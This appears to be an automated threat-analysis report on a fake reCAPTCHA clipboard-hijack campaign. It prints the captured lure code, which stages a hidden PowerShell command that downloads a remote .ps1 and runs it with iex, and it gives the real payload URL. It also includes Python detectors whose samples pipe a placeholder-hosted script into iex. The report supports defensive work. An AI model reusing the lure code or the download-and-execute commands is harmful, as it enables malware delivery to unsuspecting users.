โ† Back to Analysis

Emerging ClickGrab Campaign: Advanced Analysis of 2025-12-19 Attack Patterns


ClickGrab Threat Analysis Report - 2025-12-19

Generated on 2025-12-19 02:47:51

Executive Summary

  • Total sites analyzed: 19
  • Sites with malicious content: 1
  • Unique domains encountered: 18
  • Total URLs extracted: 64
  • PowerShell download attempts: 1
  • Clipboard manipulation instances: 4

Domain Analysis

Most Frequently Encountered Domains

  • www.webgo.de: 10 occurrences
  • godprox.cc: 8 occurrences
  • svetvip.ru: 8 occurrences
  • api.whatsapp.com: 6 occurrences
  • mc.yandex.ru: 4 occurrences
  • launchpad.net: 3 occurrences
  • httpd.apache.org: 3 occurrences
  • bugs.launchpad.net: 3 occurrences
  • www.google.com: 3 occurrences
  • t.me: 2 occurrences
  • vk.com: 2 occurrences
  • www.facebook.com: 2 occurrences
  • ok.ru: 2 occurrences
  • twitter.com: 2 occurrences
  • www.instagram.com: 2 occurrences

URL Pattern Analysis

reCAPTCHA imagery

1 occurrence across 1 distinct URL

  • https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (1 times)

Font resources

1 occurrence across 1 distinct URL

  • https://use.fontawesome.com/releases/v5.0.0/css/all.css (1 times)

CDN hosted scripts

1 occurrence across 1 distinct URL (this is the PowerShell payload, not a script library)

  • https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 (1 times)

Google resources

3 occurrences across 3 distinct URLs

  • https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (1 times)
  • https://www.google.com/intl/en/policies/privacy/ (1 times)
  • https://www.google.com/intl/en/policies/terms/ (1 times)

Suspicious Keyword Analysis

Total Keywords Found: 26 (16 unique)

Keyword Categories

Social Engineering

10 unique keywords

  • CAPTCHA Verification
  • Verification Hash
  • Verification
  • To better prove you are not a robot
  • I am not a robot
  • verification-id
  • verification
  • verification_id
  • robot
  • Robot

System Commands

2 unique keywords

  • exec(
  • exec(ua) != null){rv = parseFloat(RegExp.$1);}}else if (n.appName == "Netscape"){rv = 11;re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)");if (re.exec(ua) != null){rv = parseFloat(RegExp.$1);}}}return rv;}})(window, document, navigator)

Both hits are the same RegExp.prototype.exec() call inside a browser-version sniffing routine (it matches the "Trident/...rv:" token of Internet Explorer user agents), not a command-execution primitive; the "exec(" keyword is a false positive here. The capture rendered "l" as "i" (nuii, parseFioat, eise, $i); the characters are restored above.

Verification Text

2 unique keywords

  • hidden
  • Hidden

Technical Terms

2 unique keywords

  • failed_to_retrieve
  • iex

Most Frequent Keywords

  • failed_to_retrieve: 5 occurrences
  • robot: 3 occurrences
  • hidden: 3 occurrences
  • exec(ua) != null){rv = parseFloat(RegExp.$1);}}else if (n.appName == "Netscape"){rv = 11;re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)");if (re.exec(ua) != null){rv = parseFloat(RegExp.$1);}}}return rv;}})(window, document, navigator): 2 occurrences (browser-version sniffing, see System Commands above)
  • exec(: 2 occurrences
  • CAPTCHA Verification: 1 occurrence
  • Verification Hash: 1 occurrence
  • I am not a robot: 1 occurrence
  • Robot: 1 occurrence
  • Verification: 1 occurrence
  • verification: 1 occurrence
  • verification-id: 1 occurrence
  • verification_id: 1 occurrence
  • To better prove you are not a robot: 1 occurrence
  • iex: 1 occurrence

Similar Keyword Patterns

Groups of keywords that appear to be variations of the same theme:

Group 1: CAPTCHA Verification, Verification, verification

Group 2: Verification Hash, verification-id, verification_id

Group 3: Robot, robot

Group 4: Hidden, hidden

JavaScript Obfuscation Analysis

Obfuscation Sophistication Score: 0/7

Potential Base64 Encoded Content

The Base64 heuristic flagged the strings below, but none of them decodes to anything: the three 32-character hex values are captcha_sid parameters of the hosting site's own Bitrix CAPTCHA images (/bitrix/tools/captcha.php?captcha_sid=...), and the other two are URL path fragments. Treat them as false positives; they carry no payload, which is consistent with the 0/7 obfuscation score.

  • 04d35535e3c1bbeaec387a335b11ce92
  • /bitrix/tools/captcha
  • 0542ed493211dfd8495e7b5289bd9318
  • 09494aa87b4052889e3c0b895c7e3981
  • com/recaptcha/about/images/reCAPTCHA

Clipboard Manipulation Analysis

Detected clipboard manipulation in 4 instances.

document.execCommand("copy")

Found in 3 snippets (75.0% of clipboard code)

Examples:

document.execCommand("copy")

Textarea Manipulation

Found in 3 snippets (75.0% of clipboard code)

Examples:

setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea")

Complete Malicious Functions

Function 1:

function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }

Clipboard Attack Flow Analysis

Attack Sophistication: 6/7 components detected

Total Technique Instances: 13

Attack Flow Components

The following components show how the clipboard attack is executed:

Element Creation

Creating temporary DOM elements

Instances: 1. Example: createElement("textarea"

Content Injection

Injecting the staged text into the element

Instances: 1. Example: .value =

DOM Manipulation

Adding the element to the DOM

Instances: 3. Examples: body.append, append(

Selection Methods

Selecting the element's content for copying

Instances: 3. Example: .select()

Clipboard Operations

Executing the clipboard copy

Instances: 3. Example: execCommand("copy"

Cleanup Operations

Removing the temporary element

Instances: 2. Example: removeChild
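The component list above is the report's scoring, not code. As an added worked example (not output or code from the ClickGrab tool), the following Python reproduces that check as a static scan over page source: it looks for the six DOM calls in flow order and then for the markers that distinguish a lure from an ordinary copy button (a powershell string, iex, a hidden-window switch, the " # " suffix and the "not a robot" ploy text). The sample page is constructed: it contains the two clipboard functions quoted in this report plus a hypothetical commandToRun with a placeholder URL, because the report shows only the tail of the real one; the second, benign copy-link snippet is also constructed and shows why the DOM sequence alone is not a verdict.

```python
import re

# Constructed sample page (not a capture): the two clipboard functions quoted in this
# report, plus a hypothetical commandToRun with a placeholder URL. The report truncates
# the real one to "...32.ps1 | iex' -WindowStyle Hidden".
SAMPLE_PAGE = r'''
function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }
function stageClipboard(commandToRun, verification_id){ const suffix = " # " const ploy = "\u2713 ''I am not a robot - reCAPTCHA Verification Hash: " const end = "''" const textToCopy = commandToRun + suffix + ploy + verification_id + end setClipboardCopyData(textToCopy); }
const htaPath = "-w hidden -c \"iwr https://example.invalid/32.ps1 | iex\"";
const commandToRun = "powershell " + htaPath; stageClipboard(commandToRun, "1110");
'''

# Constructed benign page: an ordinary "copy link" button uses the very same six calls.
BENIGN_PAGE = r'''
function copyShareLink(){ const ta = document.createElement("textarea"); ta.value = window.location.href; document.body.appendChild(ta); ta.select(); document.execCommand("copy"); document.body.removeChild(ta); }
'''

# The six attack-flow components listed in this report, in the order the hijack needs them.
FLOW = [
    ("element_creation",  r'createElement\(\s*["\']textarea["\']'),
    ("content_injection", r'\.value\s*='),
    ("dom_manipulation",  r'\.(?:append|appendChild)\s*\('),
    ("selection",         r'\.select\(\)'),
    ("clipboard_copy",    r'execCommand\(\s*["\']copy["\']'),
    ("cleanup",           r'\.removeChild\('),
]

# What turns a copy-to-clipboard helper into a ClickFix lure: the staged text itself.
PAYLOAD = {
    "powershell":     r'\bpowershell\b',
    "iex":            r'\b(?:iex|Invoke-Expression)\b',
    "hidden_window":  r'-(?:WindowStyle\s+Hidden|w\s+hidden)\b',
    "comment_suffix": r'["\']\s#\s["\']',          # the " # " constant in stageClipboard
    "ploy_text":      r'not a robot|Verification Hash',
}
URL_RE = re.compile(r'https?://[^\s"\'<>)]+\.(?:ps1|hta|bat|cmd|msi|exe)\b', re.I)


def scan_page(source):
    """Score page source for the clipboard-hijack flow and its PowerShell payload."""
    counts, first_pos = {}, {}
    for name, pat in FLOW:
        matches = list(re.finditer(pat, source, re.I))
        counts[name] = len(matches)
        if matches:
            first_pos[name] = matches[0].start()
    present = [name for name, _ in FLOW if counts[name]]
    # All six present, and their first occurrences appear in flow order.
    ordered = len(present) == len(FLOW) and \
        [first_pos[n] for n, _ in FLOW] == sorted(first_pos.values())
    payload = {n: bool(re.search(p, source, re.I)) for n, p in PAYLOAD.items()}
    urls = URL_RE.findall(source)
    if ordered and payload["powershell"] and (payload["iex"] or urls):
        verdict = "clickfix_clipboard_hijack"
    elif len(present) >= 4:
        verdict = "clipboard_copy_only"   # what every share/copy button looks like
    else:
        verdict = "none"
    return {"score": len(present), "max": len(FLOW), "ordered": ordered,
            "counts": counts, "payload": payload, "urls": urls, "verdict": verdict}


if __name__ == "__main__":
    for label, page in (("sample", SAMPLE_PAGE), ("benign", BENIGN_PAGE)):
        r = scan_page(page)
        print(label, r["verdict"], f'{r["score"]}/{r["max"]}', r["urls"])
```

Both constructed pages score 6/6 with the calls in order; only the sample one carries a PowerShell string, an iex and a script URL, so only it is classified as a hijack. The order check matters because a page that merely mentions execCommand("copy") in one place and removeChild in another is not staging a clipboard payload.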

Malicious Payload Construction

How the final clipboard payload is assembled:

Command Concatenation

Instances: 1. Example: commandToRun +

Verification Text

Instances: 1

Example (page JavaScript and HTML as captured; "..." marks where the extraction truncated the source, and the mis-encoded check-mark character has been restored as ✓):

  ..."copy"); document.body.removeChild(tempTextA...
  ...ck", function (event) { event.preventDefault(); checkboxBtn.disabled = true; runClickedCheckboxEffects(); }); } }
  function runClickedCheckboxEffects() { hideCaptchaCheckbox(); setTimeout(function(){ showCaptchaLoading(); },500); setTimeout(function(){ showVerifyWindow(); },900) }
  function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; checkboxBtnSpinner.style.animation = "spin 1s linear infinite"; }
  function hideCaptchaLoading() { checkboxBtnSpinner.style.opacity = "0"; checkboxBtnSpinner.style.animation = "none"; setTimeout(function() { checkboxBtnSpinner.style.visibility = "hidden"; }, 500); }
  function hideCaptchaCheckbox() { checkboxBtn.style.visibility = "hidden"; checkboxBtn.style.opacity = "0"; }
  function showCaptchaCheckbox() { checkboxBtn.style.width = "100%"; checkboxBtn.style.height = "100%"; checkboxBtn.style.borderRadius = "2px"; checkboxBtn.style.margin = "21px 0 0 12px"; checkboxBtn.style.opacity = "1"; }
  function hideCaptchaCheckbox() { checkboxBtn.style.width = "4px"; checkboxBtn.style.height = "4px"; checkboxBtn.style.borderRadius = "50%"; checkboxBtn.style.marginLeft = "25px"; checkboxBtn.style.marginTop = "33px"; checkboxBtn.style.opacity = "0"; }
  function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; }
  function hideCaptchaLoading() { checkboxBtnSpinner.style.visibility = "hidden"; checkboxBtnSpinner.style.opacity = "0"; }
  function generateRandomNumber() { const min = 1000; const max = 9999; return Math.floor(Math.random() * (max - min + 1) + min).toString(); }
  function closeverifywindow() { verifywindow.style.display = "none"; verifywindow.style.visibility = "hidden"; verifywindow.style.opacity = "0"; showCaptchaCheckbox(); hideCaptchaLoading(); checkboxBtn.disabled = false; }
  function isverifywindowVisible() { return verifywindow.style.display !== "none" && verifywindow.style.display !== ""; }
  function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }
  function stageClipboard(commandToRun, verification_id){ const suffix = " # " const ploy = "✓ ''I am not a robot - reCAPTCHA Verification Hash: " const end = "''" const textToCopy = commandToRun + suffix + ploy + verification_id + end setClipboardCopyData(textToCopy); }
  function showVerifyWindow()...
  ...dy.append(tempTextArea); tempTextArea.select(); document.execCommand("copy");...
  ...32.ps1 | iex' -WindowStyle Hidden\""; const commandToRun = "powershell " + htaPath; stageClipboa...

  <img src="https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png" class="captcha-logo line-normal" alt="">
  ...="" id="spinner"> </div>
  <div id="verify-window" class="verify-window">
    <div class="verify-container">
      <header class="verify-header"> <span class="verify-header-text-medium m-p block">Complete these</span> <span class="verify-header-text-big m-p block">Verification Steps</span> <span class="verify-header-text-medium m-p block"></span> </header>
      <main class="verify-main">
        <p> To better prove you are not a robot, please: </p>
        <ol>
          <li> Press & hold the Windows Key <i class="fab fa-windows"></i> + <b>R</b>. </li>
          <li> In the verification window, press <b>Ctrl</b> + <b>V</b>. </li>
          <li> Press <b>Enter</b> on your keyboard to finish. </li>
        </ol>
        <p> You will observe and agree: <br> <code> ✓ "I am not a robot - reCAPTCHA Verification Hash: <span id="verification-id">1110</span>" </code> </p>
      </main>
    </div>
    <footer class="verify-container verif... <div class="verify-footer-left"> Perform the steps above to finish verification. </div>
  <p class="im-not-a-robot m-p line-normal">I'm not a robot</p>
  <img id="callback_cImg" src="/bitrix/tools/captcha.php?captcha_sid=04d35535e3c1bbeaec387a335b11ce92" width="127" height="30" alt="CAPTCHA" />
  <img id="order_cImg_new_400820" src="/bitrix/tools/captcha.php?captcha_sid=09494aa87b4052889e3c0b895c7e3981" width="127" height="30" alt="CAPTCHA" />
  <img id="callback_cImg" src="/bitrix/tools/captcha.php?captcha_sid=0542ed493211dfd8495e7b5289bd9318" width="127" height="30" alt="CAPTCHA" />
  <img id="order_cImg_new_400820" src="/bitrix/tools/captcha.php?captcha_sid=09494aa87b4052889e3c0b895c7e3981" width="127" height="30" alt="CAPTCHA"

Read together, the two halves are the whole lure. Clicking the fake checkbox hides it, shows the spinner, and after 900 ms opens the verify window, whose three steps (Win+R, Ctrl+V, Enter) have the victim paste the staged clipboard text into the Run dialog and execute it. The page defines generateRandomNumber(), which returns a random four-digit string (1000-9999); the id shown in the window (1110) is consistent with that and with the verification_id that stageClipboard appends to the clipboard text, so the tail of the pasted line matches what the page told the victim to expect. The call that connects the two falls inside the truncated showVerifyWindow().

Hash Generation

Instances: 1. Example:

  function stageClipboard(commandToRun, verification_id){ const suffix = " # " const ploy = "✓ ''I am not a robot - reCAPTCHA Verification Hash: " const end = "''" const textToCopy = commandToRun + suffix + ploy + verification_id + end setClipboardCopyData(textToCopy); }

The "hash" is not a hash or any cryptographic value: it is the verification_id string, which the page's generateRandomNumber() produces as a random four-digit number. The remainder of the extracted snippet for this instance repeats the Verification Text example above.

Comment Injection

Instances: 1. Example: " # " (the suffix constant in stageClipboard)

The space-hash-space suffix starts a PowerShell line comment. Only the powershell command in front of the "#" is executed when the victim pastes into the Run dialog; the check mark, the "I am not a robot - reCAPTCHA Verification Hash" text and the four-digit id after it are inert and are there to be the visible tail of the pasted line, matching the text the verify window told the victim to expect.
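The Command Concatenation and Comment Injection findings above describe the clipboard string without showing how a defender would take it apart. As an added worked example (not code from the ClickGrab tool or from the campaign), the following Python implements the Clipboard Monitoring idea from the Recommendations: it splits clipboard text into the part PowerShell would execute and the part the "#" turns into a comment, then evaluates indicators only on the executable part. The sample clipboard text is constructed: the command part is hypothetical with a placeholder URL (the report shows only the tail of the real one); the ploy text is the page's own. The mshta launcher and the -EncodedCommand check go beyond this page and cover the common ClickFix variants.

```python
import re
from urllib.parse import urlparse

# Constructed sample of what stageClipboard() assembles: commandToRun + " # " + ploy +
# verification_id + "''". The command part is hypothetical (placeholder URL); the report
# shows only the tail of the real one. The ploy text is the page's own.
SAMPLE_CLIPBOARD = (
    'powershell -w hidden -c "iwr https://example.invalid/32.ps1 | iex"'
    " # \u2713 ''I am not a robot - reCAPTCHA Verification Hash: 1110''"
)

# Indicators evaluated only against the executable part of the text.
INDICATORS = [
    ("powershell",    re.compile(r'\b(?:powershell|pwsh)(?:\.exe)?\b', re.I)),
    ("mshta",         re.compile(r'\bmshta(?:\.exe)?\b', re.I)),
    ("hidden_window", re.compile(r'-(?:windowstyle\s+hidden|w\s+hidden)\b', re.I)),
    ("download",      re.compile(r'\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|'
                                 r'downloadstring|net\.webclient|curl|wget)\b', re.I)),
    ("exec",          re.compile(r'\b(?:iex|invoke-expression)\b', re.I)),
    ("encoded",       re.compile(r'-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}', re.I)),
]
URL_RE = re.compile(r'https?://[^\s"\'<>()]+')


def split_comment(text):
    """Return (executed, ignored). A '#' that starts a token outside quotes begins a
    PowerShell line comment, so everything after it is inert when pasted into Run."""
    quote = None
    for i, ch in enumerate(text):
        if quote:
            if ch == quote:
                quote = None
        elif ch in ('"', "'"):
            quote = ch
        elif ch == "#" and (i == 0 or text[i - 1].isspace()):
            return text[:i].rstrip(), text[i:]
    return text.rstrip(), ""


def triage_clipboard(text):
    """Classify clipboard text the way a clipboard monitor or a process-creation rule would."""
    command, comment = split_comment(text)
    hits = [name for name, rx in INDICATORS if rx.search(command)]
    urls = URL_RE.findall(command)            # URLs in the comment are never fetched
    hosts = sorted({urlparse(u).hostname for u in urls})
    ploy = bool(re.search(r"not a robot|verification|captcha", comment, re.I))
    launcher = "powershell" in hits or "mshta" in hits
    suspicious = launcher and (bool({"exec", "download", "encoded"} & set(hits)) or bool(urls))
    return {"command": command, "comment": comment, "indicators": hits,
            "urls": urls, "hosts": hosts, "ploy_in_comment": ploy,
            "suspicious": suspicious}


if __name__ == "__main__":
    for sample in (SAMPLE_CLIPBOARD, 'echo "issue #42 is fixed" # see tracker'):
        r = triage_clipboard(sample)
        print(r["suspicious"], r["indicators"], r["hosts"], "| ignored:", r["comment"])
```

The same triage applies unchanged to the command line of the powershell.exe that the Run dialog spawns (its parent is explorer.exe), which is the point where endpoint telemetry sees the pasted text even if no clipboard hook is in place. Quote tracking matters for false positives: a "#" inside a quoted argument, as in the benign echo sample, is not a comment.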

Attack Pattern Reconstruction

Malicious Download Sources

  • https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1

Key Findings

  1. Prevalence: 5.3% of analyzed sites (1 of 19) contained malicious content
  2. Primary Attack Vector: Fake CAPTCHA verification leading to clipboard hijacking (Win+R, Ctrl+V, Enter into the Run dialog)
  3. Target Platform: Windows systems via PowerShell execution of a remotely hosted .ps1 piped to iex with a hidden window
  4. Social Engineering: UI mimicking Google reCAPTCHA, including its logo and a fake "Verification Hash" that is a random four-digit number
  5. Hosting: the same page serves the site's own Bitrix CAPTCHA images (/bitrix/tools/captcha.php), which is consistent with the fake overlay having been injected into a legitimate Bitrix-based site

Recommendations

  1. User Education: No legitimate CAPTCHA asks the user to press Win+R, paste, and press Enter; teach users that those instructions are the attack, whatever the page looks like
  2. Clipboard and Process Monitoring: The pasted text lands in the Run dialog, so the reliable telemetry is process creation: alert on explorer.exe spawning powershell.exe with a command line containing iex, -WindowStyle Hidden (or -w hidden) or a URL, and enable PowerShell script block logging (event 4104) so the downloaded script is recorded when it runs
  3. URL Filtering: Block the download source listed above, at full-URL granularity where the host is a shared CDN; do not derive blocklists from the "most frequently encountered domains" table, which is dominated by third-party references such as social-network links and Apache/Launchpad documentation pages
  4. PowerShell Hardening: Execution policy is not a security boundary; it governs script files, not -Command strings or iex of downloaded text, and is overridden by -ExecutionPolicy Bypass. Restrict who can launch PowerShell with AppLocker or WDAC, use Constrained Language Mode for users who do not need full PowerShell, and consider the "Remove Run menu from Start Menu" policy, which also disables Win+R, for users who never need the Run dialog